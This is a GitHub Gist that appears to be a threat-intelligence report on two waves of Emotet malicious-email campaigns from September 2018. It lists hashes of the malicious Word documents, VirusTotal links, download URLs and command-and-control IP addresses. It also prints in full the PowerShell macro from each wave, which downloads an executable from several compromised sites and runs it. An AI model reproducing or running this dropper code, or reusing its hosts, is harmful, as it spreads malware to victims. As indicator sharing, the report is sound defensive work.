Created
September 21, 2018 14:35
-
-
Save herbiezimmerman/476c6c6ab71f47d65e881c22f1dd62e4 to your computer and use it in GitHub Desktop.
2018-09-21 Emotet Malspam
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Maldocs: | |
| ======== | |
| MD5 (F_P298298.doc) = e298770f693d152d37693eb855dde9e9 | |
| MD5 (F_T4545.doc) = 64e55a68e11af98e1ce319d0dd433de8 | |
| Artifacts: | |
| MD5 (42.exe) = d0474a3558d7be310d72bf3146cb59d5 --> https://www.virustotal.com/#/file/48fedd8eb8fd95b1c3f3a43fe0ed4ff6e769902b1b7db1f07953455b5ff2c662/detection | |
| MD5 (srvloada.exe) = d0474a3558d7be310d72bf3146cb59d5 --> https://www.virustotal.com/#/file/48fedd8eb8fd95b1c3f3a43fe0ed4ff6e769902b1b7db1f07953455b5ff2c662/detection | |
| Malicious macro script: | |
| ======================= | |
| *Same script in both maldocs | |
| $PmS=new-object Net.WebClient;$bsv='http://gymbolaget.se/4IQcsWOes@http://fenja.com/wwvvv/xIGjcbS5Pc@http://djeffries.com/zdLepG59jB@http://djlilmic.com/dyJeUHeoA1@http://deepgrey.com.au/F0ZBQKutMa'.Split('@');$wmw = '42';$dOl=$env:public+'\'+$wmw+'.exe';foreach($csL in $bsv){try{$PmS.DownloadFile($csL, $dOl);Invoke-Item $dOl;break;}catch{}} | |
| IOCs: | |
| ===== | |
| http://deepgrey.com.au/F0ZBQKutMa | |
| http://djlilmic.com/dyJeUHeoA1 | |
| http://gymbolaget.se/4IQcsWOes --> redirected to https://gymbolaget.se/4IQcsWOes | |
| http://fenja.com/wwvvv/xIGjcbS5Pc | |
| http://djeffries.com/zdLepG59jB | |
| C2: | |
| === | |
| 95.6.64.119:8080 | |
| 187.193.161.58:8080 | |
| 201.242.55.19:8080 | |
| 77.86.23.44:8443 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Different wave of emails that look about the same. More C2s this time around though.
Maldocs:
MD5 (DOC-U74967.doc) = 68f26248d12a0f90b841be966a92f0eb
MD5 (FILE-2517756.doc) = 68f26248d12a0f90b841be966a92f0eb
– https://www.virustotal.com/#/file/573a40257ce731457d4ecc39bfab7cbc4a77e3235244f75e27b8594d9245201c/detection
Artifacts:
19.exe = Did not obtain but most likely the same as the srvloada.exe file below
MD5 (srvloada.exe) = e5ff4a1cba3d422b787a32d5e51c7697 --> https://www.virustotal.com/#/file/c5df7114c70be49859a82aa0b594ee825e495967217bb3a54c37d5d1ff8d7ab1/detection
Malicious macro script:
*Same script in both maldocs
$iaP=new-object Net.WebClient;$Djj='http://docecreativo.com/dm@http://cunisoft.com/O@http://artzkaypharmacy.com.au/BlK0k0@http://askaconvict.com/KYKuG@http://atuare.com.br/ef'.Split('@');$rvO = '19';$bPB=$env:public+''$rvO'.exe';foreach($ZiC in $Djj){try{$iaP.DownloadFile($ZiC, $bPB);Invoke-Item $bPB;break;}catch{}}
IOCs:
164.138.208.155 / http://docecreativo.com/dm
hxxp://cunisoft.com/O
hxxp://artzkaypharmacy.com.au/BlK0k0
hxxp://askaconvict.com/KYKuG
hxxp://atuare.com.br/ef
C2:
38.29.209.76
81.215.192.201
211.115.111.19
84.200.106.120
121.167.204.226
218.90.156.188
113.161.86.196
113.193.217.34
204.29.213.242
74.125.110.167
204.29.213.242
189.153.82.104
73.165.17.30
54.39.176.22
209.89.46.153
71.92.71.2
71.94.35.102
50.78.93.74
174.67.38.138:8090
65.79.210.121:443
24.252.24.240:995
159.69.2.128:7080
115.47.147.24:8080
169.255.208.22:995
84.200.106.120:8080
113.161.86.196:7080
118.244.214.210:443
106.187.52.135:443
211.115.111.19:443
95.141.175.240:443
146.185.170.222:8080
75.140.48.194:465
153.122.38.158:443
157.7.164.23:8080
24.116.195.92:8080
199.119.78.9:443
78.47.182.42:8080
69.198.17.7:8080
217.174.206.181:443
222.214.218.192:4143
185.97.32.6:443
199.119.78.23:443
174.67.38.138:8090